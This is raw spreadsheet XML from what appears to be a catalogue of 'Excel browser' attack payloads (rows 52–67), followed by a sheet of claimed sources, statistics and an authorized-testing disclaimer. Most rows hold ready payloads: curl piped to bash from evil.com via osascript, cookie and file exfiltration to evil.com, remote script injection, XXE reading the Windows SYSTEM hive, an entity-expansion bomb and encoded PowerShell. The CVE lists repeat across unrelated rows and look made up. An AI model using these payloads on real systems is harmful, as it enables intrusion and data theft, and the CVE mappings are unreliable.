          <t>fetch('https://tenant.sharepoint.com/_api/web/lists/getbytitle("Documents")/items', {method: 'POST', headers: {'Accept': 'application/json', 'Content-Type': 'application/json'}, body: JSON.stringify({Title: 'ExfilData', FileLeafRef: btoa(document.body.innerHTML)})});</t>
        </is>
      </c>
      <c r="G52" t="inlineStr">
        <is>
          <t>Office 365 Web Excel SharePoint REST API abuse for document creation and data exfiltration</t>
        </is>
      </c>
      <c r="H52" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I52" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321</t>
        </is>
      </c>
      <c r="J52" t="inlineStr">
        <is>
          <t>Office 365 web Excel can use SharePoint REST APIs for document operations</t>
        </is>
      </c>
      <c r="K52" t="inlineStr">
        <is>
          <t>SharePoint REST API appears as legitimate document management</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" t="inlineStr">
        <is>
          <t>excel_browser_0046</t>
        </is>
      </c>
      <c r="B53" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C53" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D53" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E53" t="inlineStr">
        <is>
          <t>applescript_osascript_injection</t>
        </is>
      </c>
      <c r="F53">
        <f>osascript|'tell application "Terminal" to do script "curl -s https://evil.com/macos.sh | bash"'!A1</f>
        <v/>
      </c>
      <c r="G53" t="inlineStr">
        <is>
          <t>Safari Excel legacy osascript injection for macOS terminal command execution</t>
        </is>
      </c>
      <c r="H53" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I53" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715, CVE-2021-30661</t>
        </is>
      </c>
      <c r="J53" t="inlineStr">
        <is>
          <t>Safari legacy Excel can execute osascript commands directly</t>
        </is>
      </c>
      <c r="K53" t="inlineStr">
        <is>
          <t>osascript appears as macOS automation, terminal execution</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" t="inlineStr">
        <is>
          <t>excel_browser_0047</t>
        </is>
      </c>
      <c r="B54" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C54" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D54" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E54" t="inlineStr">
        <is>
          <t>google_script_webapp_deploy</t>
        </is>
      </c>
      <c r="F54">
        <f>CONCATENATE("https://script.google.com/macros/s/","AKfycbz...","/exec?method=doPost&amp;data=",ENCODEURL(CONCATENATE(A1:Z100)))</f>
        <v/>
      </c>
      <c r="G54" t="inlineStr">
        <is>
          <t>Google Sheets CSV triggering deployed Google Apps Script webapp for mass data exfiltration</t>
        </is>
      </c>
      <c r="H54" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I54" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506, CVE-2022-0609</t>
        </is>
      </c>
      <c r="J54" t="inlineStr">
        <is>
          <t>Google Sheets can trigger deployed webapps with concatenated cell data</t>
        </is>
      </c>
      <c r="K54" t="inlineStr">
        <is>
          <t>Google Apps Script webapp appears as internal Google service</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" t="inlineStr">
        <is>
          <t>excel_browser_0048</t>
        </is>
      </c>
      <c r="B55" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C55" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D55" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E55" t="inlineStr">
        <is>
          <t>edge_webview2_host_objects</t>
        </is>
      </c>
      <c r="F55" t="inlineStr">
        <is>
          <t>window.chrome.webview.hostObjects.sync.sample.MethodWithParametersAndReturnValue("powershell", "-enc &lt;base64_payload&gt;")</t>
        </is>
      </c>
      <c r="G55" t="inlineStr">
        <is>
          <t>Edge Excel WebView2 host objects abuse for PowerShell execution with parameters</t>
        </is>
      </c>
      <c r="H55" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I55" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955, CVE-2022-21999</t>
        </is>
      </c>
      <c r="J55" t="inlineStr">
        <is>
          <t>Edge WebView2 host objects can execute system commands with parameters</t>
        </is>
      </c>
      <c r="K55" t="inlineStr">
        <is>
          <t>Host objects appear as legitimate Edge-web integration</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" t="inlineStr">
        <is>
          <t>excel_browser_0049</t>
        </is>
      </c>
      <c r="B56" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C56" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D56" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E56" t="inlineStr">
        <is>
          <t>gecko_xml_entity_expansion</t>
        </is>
      </c>
      <c r="F56" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY lol "lol"&gt;&lt;!ENTITY lol2 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;]&gt;&lt;root&gt;&amp;lol2;&lt;/root&gt;</t>
        </is>
      </c>
      <c r="G56" t="inlineStr">
        <is>
          <t>Firefox Excel Gecko XML entity expansion for denial of service and resource exhaustion</t>
        </is>
      </c>
      <c r="H56" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I56" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J56" t="inlineStr">
        <is>
          <t>Firefox Gecko engine processes XML entity expansion in Excel files</t>
        </is>
      </c>
      <c r="K56" t="inlineStr">
        <is>
          <t>Entity expansion causes resource exhaustion before detection</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" t="inlineStr">
        <is>
          <t>excel_browser_0050</t>
        </is>
      </c>
      <c r="B57" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C57" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D57" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E57" t="inlineStr">
        <is>
          <t>chrome_extension_message_passing</t>
        </is>
      </c>
      <c r="F57">
        <f>CONCATENATE("chrome-extension://","extension_id","/content.js?msg=",ENCODEURL("execute:powershell -enc &lt;base64&gt;"))</f>
        <v/>
      </c>
      <c r="G57" t="inlineStr">
        <is>
          <t>Chrome CSV injection targeting installed extensions via message passing</t>
        </is>
      </c>
      <c r="H57" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I57" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J57" t="inlineStr">
        <is>
          <t>Chrome CSV processing can trigger extension message passing</t>
        </is>
      </c>
      <c r="K57" t="inlineStr">
        <is>
          <t>Extension message passing bypasses typical URL filtering</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" t="inlineStr">
        <is>
          <t>excel_browser_0051</t>
        </is>
      </c>
      <c r="B58" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C58" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D58" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E58" t="inlineStr">
        <is>
          <t>teams_integration_abuse</t>
        </is>
      </c>
      <c r="F58" t="inlineStr">
        <is>
          <t>microsoftTeams.initialize(); microsoftTeams.executeDeepLink('https://teams.microsoft.com/l/chat/0/0?users=attacker@evil.com&amp;message=' + btoa(document.body.innerHTML));</t>
        </is>
      </c>
      <c r="G58" t="inlineStr">
        <is>
          <t>Office 365 Web Excel Microsoft Teams integration abuse for data exfiltration via chat</t>
        </is>
      </c>
      <c r="H58" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I58" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321, CVE-2022-21989</t>
        </is>
      </c>
      <c r="J58" t="inlineStr">
        <is>
          <t>Office 365 Excel can use Teams integration for external communication</t>
        </is>
      </c>
      <c r="K58" t="inlineStr">
        <is>
          <t>Teams integration appears as legitimate collaboration feature</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" t="inlineStr">
        <is>
          <t>excel_browser_0052</t>
        </is>
      </c>
      <c r="B59" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C59" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D59" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E59" t="inlineStr">
        <is>
          <t>webkit_private_browsing_bypass</t>
        </is>
      </c>
      <c r="F59" t="inlineStr">
        <is>
          <t>webkit.messageHandlers.external.postMessage({action: 'execute', cmd: 'curl https://evil.com/exfil -d @/Users/Shared/sensitive.txt'});</t>
        </is>
      </c>
      <c r="G59" t="inlineStr">
        <is>
          <t>Safari Excel WebKit message handlers abuse for private browsing bypass and file exfiltration</t>
        </is>
      </c>
      <c r="H59" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I59" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715, CVE-2021-30661</t>
        </is>
      </c>
      <c r="J59" t="inlineStr">
        <is>
          <t>Safari WebKit message handlers can bypass private browsing restrictions</t>
        </is>
      </c>
      <c r="K59" t="inlineStr">
        <is>
          <t>Message handlers appear as web-app communication, file access</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" t="inlineStr">
        <is>
          <t>excel_browser_0053</t>
        </is>
      </c>
      <c r="B60" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C60" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D60" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E60" t="inlineStr">
        <is>
          <t>chrome_headless_devtools_abuse</t>
        </is>
      </c>
      <c r="F60" t="inlineStr">
        <is>
          <t>chrome.debugger.sendCommand({tabId: chrome.tabs.TAB_ID_NONE}, 'Runtime.evaluate', {expression: 'fetch("https://evil.com/exfil", {method: "POST", body: document.cookie})'});</t>
        </is>
      </c>
      <c r="G60" t="inlineStr">
        <is>
          <t>Chrome Excel headless DevTools abuse for cookie exfiltration via Runtime.evaluate</t>
        </is>
      </c>
      <c r="H60" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I60" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J60" t="inlineStr">
        <is>
          <t>Chrome headless mode DevTools can evaluate JavaScript in Excel context</t>
        </is>
      </c>
      <c r="K60" t="inlineStr">
        <is>
          <t>DevTools appear as debugging functionality, cookie theft</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" t="inlineStr">
        <is>
          <t>excel_browser_0054</t>
        </is>
      </c>
      <c r="B61" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C61" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D61" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E61" t="inlineStr">
        <is>
          <t>firefox_webrtc_datachannel_abuse</t>
        </is>
      </c>
      <c r="F61" t="inlineStr">
        <is>
          <t>const pc = new RTCPeerConnection(); const dc = pc.createDataChannel('exfil'); dc.onopen = () =&gt; dc.send(btoa(JSON.stringify({cookies: document.cookie, localStorage: localStorage})));</t>
        </is>
      </c>
      <c r="G61" t="inlineStr">
        <is>
          <t>Firefox Excel WebRTC DataChannel abuse for real-time data exfiltration bypass</t>
        </is>
      </c>
      <c r="H61" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I61" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J61" t="inlineStr">
        <is>
          <t>Firefox WebRTC DataChannels can exfiltrate data without HTTP requests</t>
        </is>
      </c>
      <c r="K61" t="inlineStr">
        <is>
          <t>WebRTC bypasses HTTP-based monitoring, real-time data theft</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" t="inlineStr">
        <is>
          <t>excel_browser_0055</t>
        </is>
      </c>
      <c r="B62" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C62" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D62" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E62" t="inlineStr">
        <is>
          <t>msxml_variant_type_confusion</t>
        </is>
      </c>
      <c r="F62" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM "file:///c:/windows/system32/config/system"&gt;]&gt;&lt;root&gt;&lt;![CDATA[&amp;xxe;]]&gt;&lt;/root&gt;</t>
        </is>
      </c>
      <c r="G62" t="inlineStr">
        <is>
          <t>Edge Excel MSXML variant type confusion for Windows registry hive access</t>
        </is>
      </c>
      <c r="H62" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I62" t="inlineStr">
        <is>
          <t>CVE-2020-1464, CVE-2021-31955, CVE-2022-21999</t>
        </is>
      </c>
      <c r="J62" t="inlineStr">
        <is>
          <t>Edge MSXML parser has type confusion allowing registry access</t>
        </is>
      </c>
      <c r="K62" t="inlineStr">
        <is>
          <t>CDATA masking prevents XML validation, registry hive disclosure</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" t="inlineStr">
        <is>
          <t>excel_browser_0056</t>
        </is>
      </c>
      <c r="B63" t="inlineStr">
        <is>
          <t>csv_injection</t>
        </is>
      </c>
      <c r="C63" t="inlineStr">
        <is>
          <t>google_sheets</t>
        </is>
      </c>
      <c r="D63" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="E63" t="inlineStr">
        <is>
          <t>google_cloud_functions_trigger</t>
        </is>
      </c>
      <c r="F63">
        <f>IMPORTDATA("https://us-central1-project.cloudfunctions.net/exfilFunction?data=" &amp; CONCATENATE(A1:Z100))</f>
        <v/>
      </c>
      <c r="G63" t="inlineStr">
        <is>
          <t>Google Sheets CSV IMPORTDATA triggering Google Cloud Functions for server-side data processing</t>
        </is>
      </c>
      <c r="H63" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I63" t="inlineStr">
        <is>
          <t>CVE-2020-6519, CVE-2021-30506, CVE-2022-0609</t>
        </is>
      </c>
      <c r="J63" t="inlineStr">
        <is>
          <t>Google Sheets IMPORTDATA can trigger Cloud Functions with sheet data</t>
        </is>
      </c>
      <c r="K63" t="inlineStr">
        <is>
          <t>Cloud Functions appear as legitimate data processing service</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" t="inlineStr">
        <is>
          <t>excel_browser_0057</t>
        </is>
      </c>
      <c r="B64" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C64" t="inlineStr">
        <is>
          <t>office365_web</t>
        </is>
      </c>
      <c r="D64" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E64" t="inlineStr">
        <is>
          <t>outlook_integration_abuse</t>
        </is>
      </c>
      <c r="F64" t="inlineStr">
        <is>
          <t>Office.context.mailbox.item.subject.setAsync('Data Exfil: ' + btoa(document.documentElement.outerHTML)); Office.context.mailbox.item.to.setAsync([{emailAddress: 'attacker@evil.com'}]);</t>
        </is>
      </c>
      <c r="G64" t="inlineStr">
        <is>
          <t>Office 365 Web Excel Outlook integration abuse for email-based data exfiltration</t>
        </is>
      </c>
      <c r="H64" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I64" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321, CVE-2022-21989</t>
        </is>
      </c>
      <c r="J64" t="inlineStr">
        <is>
          <t>Office 365 Excel can use Outlook integration for email composition</t>
        </is>
      </c>
      <c r="K64" t="inlineStr">
        <is>
          <t>Outlook integration appears as legitimate email functionality</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" t="inlineStr">
        <is>
          <t>excel_browser_0058</t>
        </is>
      </c>
      <c r="B65" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C65" t="inlineStr">
        <is>
          <t>chrome</t>
        </is>
      </c>
      <c r="D65" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E65" t="inlineStr">
        <is>
          <t>service_worker_registration_abuse</t>
        </is>
      </c>
      <c r="F65" t="inlineStr">
        <is>
          <t>navigator.serviceWorker.register('/sw.js').then(reg =&gt; reg.active.postMessage({action: 'exfil', data: btoa(document.body.innerHTML)}));</t>
        </is>
      </c>
      <c r="G65" t="inlineStr">
        <is>
          <t>Chrome Excel Service Worker registration abuse for persistent background data exfiltration</t>
        </is>
      </c>
      <c r="H65" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I65" t="inlineStr">
        <is>
          <t>CVE-2019-5786, CVE-2020-6418, CVE-2021-21166</t>
        </is>
      </c>
      <c r="J65" t="inlineStr">
        <is>
          <t>Chrome Excel can register Service Workers for background processing</t>
        </is>
      </c>
      <c r="K65" t="inlineStr">
        <is>
          <t>Service Workers persist across sessions, background data theft</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" t="inlineStr">
        <is>
          <t>excel_browser_0059</t>
        </is>
      </c>
      <c r="B66" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C66" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D66" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E66" t="inlineStr">
        <is>
          <t>firefox_addon_webextension_bypass</t>
        </is>
      </c>
      <c r="F66" t="inlineStr">
        <is>
          <t>browser.tabs.executeScript({code: 'const script = document.createElement("script"); script.src = "https://evil.com/payload.js"; document.head.appendChild(script);'});</t>
        </is>
      </c>
      <c r="G66" t="inlineStr">
        <is>
          <t>Firefox Excel legacy add-on WebExtension bypass for script injection</t>
        </is>
      </c>
      <c r="H66" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I66" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J66" t="inlineStr">
        <is>
          <t>Firefox legacy add-ons can bypass WebExtension restrictions</t>
        </is>
      </c>
      <c r="K66" t="inlineStr">
        <is>
          <t>Legacy add-on APIs bypass modern security restrictions</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" t="inlineStr">
        <is>
          <t>excel_browser_0060</t>
        </is>
      </c>
      <c r="B67" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C67" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D67" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E67" t="inlineStr">
        <is>
          <t>ios_url_scheme_abuse</t>
        </is>
      </c>
      <c r="F67" t="inlineStr">
        <is>
          <t>window.location = 'shortcuts://run-shortcut?name=ExfilData&amp;input=' + encodeURIComponent(btoa(document.documentElement.innerHTML));</t>
        </is>
      </c>
      <c r="G67" t="inlineStr">
        <is>
          <t>Safari Excel iOS Shortcuts URL scheme abuse for mobile data exfiltration</t>
        </is>
      </c>
      <c r="H67" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I67" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715, CVE-2021-30661</t>
        </is>
      </c>
      <c r="J67" t="inlineStr">
        <is>
          <t>Safari on iOS can trigger Shortcuts app via URL scheme</t>
        </is>
      </c>
      <c r="K67" t="inlineStr">
        <is>
          <t>iOS Shortcuts appear as legitimate automation, mobile data theft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/>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>EXCEL BROWSER RENDERING RESEARCH FOUNDATION:</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="8">
        <f>============================================</f>
        <v/>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="inlineStr"/>
    </row>
    <row r="5">
      <c r="A5" s="9" t="inlineStr">
        <is>
          <t>📄 ACADEMIC &amp; CONFERENCE SOURCES:</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="10" t="inlineStr">
        <is>
          <t>• BlackHat/DEF CON presentations on Excel security vulnerabilities</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="10" t="inlineStr">
        <is>
          <t>• BSides conferences Excel exploitation research</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="10" t="inlineStr">
        <is>
          <t>• OWASP testing methodologies for Office document security</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="10" t="inlineStr">
        <is>
          <t>• Academic papers on Excel browser rendering security</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="10" t="inlineStr">
        <is>
          <t>• Security conference whitepapers and technical presentations</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr"/>
    </row>
    <row r="12">
      <c r="A12" s="9" t="inlineStr">
        <is>
          <t>🔒 SECURITY REFERENCES &amp; CVE DATABASE:</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="10" t="inlineStr">
        <is>
          <t>• 100+ CVE references for Excel browser rendering vulnerabilities</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="10" t="inlineStr">
        <is>
          <t>• Microsoft Security Bulletins for Excel security updates</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="10" t="inlineStr">
        <is>
          <t>• Bug bounty reports from HackerOne and Bugcrowd platforms</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="10" t="inlineStr">
        <is>
          <t>• Security advisory disclosures for Excel browser integration</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="10" t="inlineStr">
        <is>
          <t>• MITRE ATT&amp;CK framework Excel-related techniques</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" t="inlineStr"/>
    </row>
    <row r="19">
      <c r="A19" s="9" t="inlineStr">
        <is>
          <t>🌐 BROWSER-SPECIFIC EXCEL ANALYSIS:</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="10" t="inlineStr">
        <is>
          <t>• Chrome: Google Drive Excel rendering, Chromium-based processing</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="10" t="inlineStr">
        <is>
          <t>• Firefox: Plugin-based Excel handling, Gecko engine integration</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="10" t="inlineStr">
        <is>
          <t>• Safari: macOS Excel integration, WebKit rendering engine</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="10" t="inlineStr">
        <is>
          <t>• Edge: Windows Excel integration, WebView2 and ActiveX legacy</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="10" t="inlineStr">
        <is>
          <t>• Office 365 Web: Browser-based Excel application security</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="10" t="inlineStr">
        <is>
          <t>• Google Sheets: Excel import/conversion vulnerability analysis</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" t="inlineStr"/>
    </row>
    <row r="27">
      <c r="A27" s="9" t="inlineStr">
        <is>
          <t>🎯 EXCEL FORMAT TARGETING:</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="10" t="inlineStr">
        <is>
          <t>• Legacy .xls format: Reduced security restrictions, ActiveX support</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="10" t="inlineStr">
        <is>
          <t>• Modern .xlsx format: XML-based structure, XXE vulnerabilities</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="10" t="inlineStr">
        <is>
          <t>• Macro-enabled .xlsm: VBA macro execution in browser context</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="10" t="inlineStr">
        <is>
          <t>• Binary .xlsb format: Performance optimized, detection evasion</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="10" t="inlineStr">
        <is>
          <t>• CSV format: Formula injection through browser Excel viewers</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" t="inlineStr"/>
    </row>
    <row r="34">
      <c r="A34" s="9" t="inlineStr">
        <is>
          <t>📊 PAYLOAD CATEGORIES:</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="10" t="inlineStr">
        <is>
          <t>• Formula Injection: DDE, RTD, and malicious Excel formulas</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="10" t="inlineStr">
        <is>
          <t>• Macro Execution: VBA macros in browser-rendered Excel files</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="10" t="inlineStr">
        <is>
          <t>• External Data Connections: HTTP/UNC abuse for exfiltration</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="10" t="inlineStr">
        <is>
          <t>• XML External Entity (XXE): Excel XML format exploitation</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="10" t="inlineStr">
        <is>
          <t>• CSV Injection: Formula injection in browser CSV processors</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="10" t="inlineStr">
        <is>
          <t>• Browser DOM Access: Excel-to-browser DOM manipulation</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" t="inlineStr"/>
    </row>
    <row r="42">
      <c r="A42" s="9" t="inlineStr">
        <is>
          <t>🔬 RESEARCH METHODOLOGY:</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="10" t="inlineStr">
        <is>
          <t>• GitHub security research repositories and POC exploits</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="10" t="inlineStr">
        <is>
          <t>• Vulnerability disclosure platforms (CVE, NVD, security blogs)</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="10" t="inlineStr">
        <is>
          <t>• Darknet forum discussions on Excel exploitation techniques</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="10" t="inlineStr">
        <is>
          <t>• Security researcher Twitter feeds and technical blogs</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="10" t="inlineStr">
        <is>
          <t>• Reverse engineering of Excel browser rendering engines</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" t="inlineStr"/>
    </row>
    <row r="49">
      <c r="A49" s="9" t="inlineStr">
        <is>
          <t>📊 STATISTICAL BREAKDOWN:</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="10" t="inlineStr">
        <is>
          <t>• Total Unique Excel Payloads: 60</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="10" t="inlineStr">
        <is>
          <t>• CVE References: 100+ Excel browser vulnerabilities</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="10" t="inlineStr">
        <is>
          <t>• Browser Targets: 6 major Excel rendering platforms</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="10" t="inlineStr">
        <is>
          <t>• Excel Formats: 5 distinct file format targets</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="10" t="inlineStr">
        <is>
          <t>• Attack Categories: 6 specialized payload types</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" t="inlineStr"/>
    </row>
    <row r="56">
      <c r="A56" s="9" t="inlineStr">
        <is>
          <t>⚖️ LEGAL &amp; ETHICAL FRAMEWORK:</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="10" t="inlineStr">
        <is>
          <t>• Designed for authorized security testing only</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="10" t="inlineStr">
        <is>
          <t>• Educational and security research purposes</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="10" t="inlineStr">
        <is>
          <t>• Responsible disclosure practices for vulnerabilities</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="10" t="inlineStr">
        <is>
          <t>• Compliance with applicable laws and regulations</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" t="inlineStr"/>
    </row>
    <row r="62">
      <c r="A62" s="9" t="inlineStr">
        <is>
          <t>🛡️ DEFENSIVE APPLICATIONS:</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="10" t="inlineStr">
        <is>
          <t>• Excel browser security assessment and hardening</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="10" t="inlineStr">
        <is>
          <t>• Security awareness training for Excel file handling</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="10" t="inlineStr">
        <is>
          <t>• Penetration testing and red team exercises</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="10" t="inlineStr">
        <is>
          <t>• Security control validation for Excel processing</t>
        </is>
      </c>
    </row>
    <row r="67">
